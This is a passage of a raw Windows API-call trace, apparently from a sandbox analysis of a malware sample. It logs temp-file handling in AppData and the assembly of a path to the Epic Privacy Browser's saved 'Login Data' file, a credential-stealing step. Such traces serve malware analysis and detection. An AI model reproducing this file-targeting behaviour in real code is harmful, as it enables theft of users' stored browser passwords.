hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1fa08 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1f7c0 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0f20 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1ed50 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e125a0 | out: hHeap=0x2e10000) returned 1 [0203.216] LockFile (hFile=0x2a0, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0203.216] LockFileEx (in: hFile=0x2a0, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x415f5bc | out: lpOverlapped=0x415f5bc) returned 1 [0203.216] UnlockFile (hFile=0x2a0, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0203.216] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12512, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0203.216] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x84) returned 0x44f0d70 [0203.216] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12512, cbMultiByte=-1, lpWideCharStr=0x44f0d70, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-journal") returned 66 [0203.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x415f6a8 | out: lpFileInformation=0x415f6a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.216] GetLastError () returned 0x2 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0d70 | out: hHeap=0x2e10000) returned 1 [0203.216] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x415f6fc | out: lpFileSizeHigh=0x415f6fc*=0x0) returned 0x4800 [0203.216] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=24, lpDistanceToMoveHigh=0x415f700*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x415f700*=0) returned 0x18 [0203.217] ReadFile (in: hFile=0x2a0, lpBuffer=0x415f73c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x415f70c, lpOverlapped=0x0 | out: lpBuffer=0x415f73c*, lpNumberOfBytesRead=0x415f70c*=0x10, lpOverlapped=0x0) returned 1 [0203.217] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x415f6e4 | out: lpFileSizeHigh=0x415f6e4*=0x0) returned 0x4800 [0203.217] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12554, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0203.217] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x7c) returned 0x44f0d70 [0203.217] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12554, cbMultiByte=-1, lpWideCharStr=0x44f0d70, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-wal") returned 62 [0203.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-wal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x415f6c8 | out: lpFileInformation=0x415f6c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.217] GetLastError () returned 0x2 [0203.217] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0d70 | out: hHeap=0x2e10000) returned 1 [0203.217] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x415f6fc | out: lpFileSizeHigh=0x415f6fc*=0x0) returned 0x4800 [0203.217] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x180) returned 0x2e125a0 [0203.217] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x890) returned 0x44fde08 [0203.217] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=6144, lpDistanceToMoveHigh=0x415f710*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x415f710*=0) returned 0x1800 [0203.217] ReadFile (in: hFile=0x2a0, lpBuffer=0x44fde34, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x415f71c, lpOverlapped=0x0 | out: lpBuffer=0x44fde34*, lpNumberOfBytesRead=0x415f71c*=0x800, lpOverlapped=0x0) returned 1 [0203.217] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e125a0 | out: hHeap=0x2e10000) returned 1 [0203.217] UnlockFile (hFile=0x2a0, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0203.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0203.217] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.218] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" [0203.218] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp")) returned 0 [0203.218] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp") returned 57 [0203.218] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.219] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp" [0203.219] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eidnomh.tmp")) returned 1 [0203.221] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.221] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.221] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.223] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.223] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.223] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.223] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.223] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.224] lstrlenW (lpString="\\") returned 1 [0203.224] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.224] lstrlenW (lpString="\\") returned 1 [0203.224] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.224] lstrlenW (lpString="\\") returned 1 [0203.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.224] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.224] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.224] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.225] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.225] GetProcessHeap () returned 0x900000 [0203.225] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.225] lstrlenA (lpString="laDBwuK") returned 7 [0203.225] lstrlenA (lpString="laDBwuK") returned 7 [0203.225] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.225] lstrcpyA (in: lpString1=0x2d80000, lpString2="laDBwuK" | out: lpString1="laDBwuK") returned="laDBwuK" [0203.225] lstrlenA (lpString="laDBwuK") returned 7 [0203.225] lstrlenA (lpString="laDBwuK") returned 7 [0203.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.225] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.226] lstrlenA (lpString="laDBwuK") returned 7 [0203.226] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="laDBwuK") returned 8 [0203.226] lstrlenW (lpString="laDBwuK") returned 7 [0203.226] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.226] lstrlenW (lpString="laDBwuK") returned 7 [0203.226] lstrcpyW (in: lpString1=0x2df0000, lpString2="laDBwuK" | out: lpString1="laDBwuK") returned="laDBwuK" [0203.226] lstrlenW (lpString="laDBwuK") returned 7 [0203.226] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.227] lstrcpyW (in: lpString1=0x2e20000, lpString2="laDBwuK" | out: lpString1="laDBwuK") returned="laDBwuK" [0203.227] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.227] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.227] lstrlenW (lpString="laDBwuK") returned 7 [0203.227] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.228] lstrcatW (in: lpString1="", lpString2="laDBwuK" | out: lpString1="laDBwuK") returned="laDBwuK" [0203.228] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.228] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.228] GetProcessHeap () returned 0x900000 [0203.228] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.228] lstrlenW (lpString="laDBwuK") returned 7 [0203.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.228] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.229] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.229] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="laDBwuK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK" [0203.229] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.230] lstrlenW (lpString=".tmp") returned 4 [0203.230] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.230] lstrlenW (lpString=".tmp") returned 4 [0203.230] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.230] lstrlenW (lpString=".tmp") returned 4 [0203.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK") returned 53 [0203.230] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.230] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.230] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\laDBwuK.tmp" [0203.231] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.231] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.231] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.232] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.232] lstrlenW (lpString="\\") returned 1 [0203.232] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.232] lstrlenW (lpString="\\") returned 1 [0203.232] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.232] lstrlenW (lpString="\\") returned 1 [0203.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.232] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.232] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.233] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.233] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.233] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.233] GetProcessHeap () returned 0x900000 [0203.233] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.233] lstrlenA (lpString="Dsvazib") returned 7 [0203.233] lstrlenA (lpString="Dsvazib") returned 7 [0203.233] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.234] lstrcpyA (in: lpString1=0x2d80000, lpString2="Dsvazib" | out: lpString1="Dsvazib") returned="Dsvazib" [0203.234] lstrlenA (lpString="Dsvazib") returned 7 [0203.234] lstrlenA (lpString="Dsvazib") returned 7 [0203.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.234] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.234] lstrlenA (lpString="Dsvazib") returned 7 [0203.234] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="Dsvazib") returned 8 [0203.234] lstrlenW (lpString="Dsvazib") returned 7 [0203.234] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.235] lstrlenW (lpString="Dsvazib") returned 7 [0203.235] lstrcpyW (in: lpString1=0x2e20000, lpString2="Dsvazib" | out: lpString1="Dsvazib") returned="Dsvazib" [0203.235] lstrlenW (lpString="Dsvazib") returned 7 [0203.235] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.235] lstrcpyW (in: lpString1=0x2eb0000, lpString2="Dsvazib" | out: lpString1="Dsvazib") returned="Dsvazib" [0203.235] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.235] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.236] lstrlenW (lpString="Dsvazib") returned 7 [0203.236] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.236] lstrcatW (in: lpString1="", lpString2="Dsvazib" | out: lpString1="Dsvazib") returned="Dsvazib" [0203.236] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.237] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.237] GetProcessHeap () returned 0x900000 [0203.237] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.237] lstrlenW (lpString="Dsvazib") returned 7 [0203.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.237] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.237] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.238] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.238] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Dsvazib" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib" [0203.238] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.238] lstrlenW (lpString=".tmp") returned 4 [0203.238] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.239] lstrlenW (lpString=".tmp") returned 4 [0203.239] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.239] lstrlenW (lpString=".tmp") returned 4 [0203.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib") returned 53 [0203.239] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.239] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.239] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.240] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dsvazib.tmp" [0203.240] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.240] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.240] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.240] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.240] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.240] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.240] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.240] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.241] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.241] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.241] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 50 [0203.241] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.241] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 50 [0203.242] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Epic Privacy Browser\\User Data\\Default\\Login Data" | out: lpString1="\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned="\\Epic Privacy Browser\\User Data\\Default\\Login Data" [0203.242] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 50 [0203.242] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.242] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.242] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.242] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.242] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data" [0203.242] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.243] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.243] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.243] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.243] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.244] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS 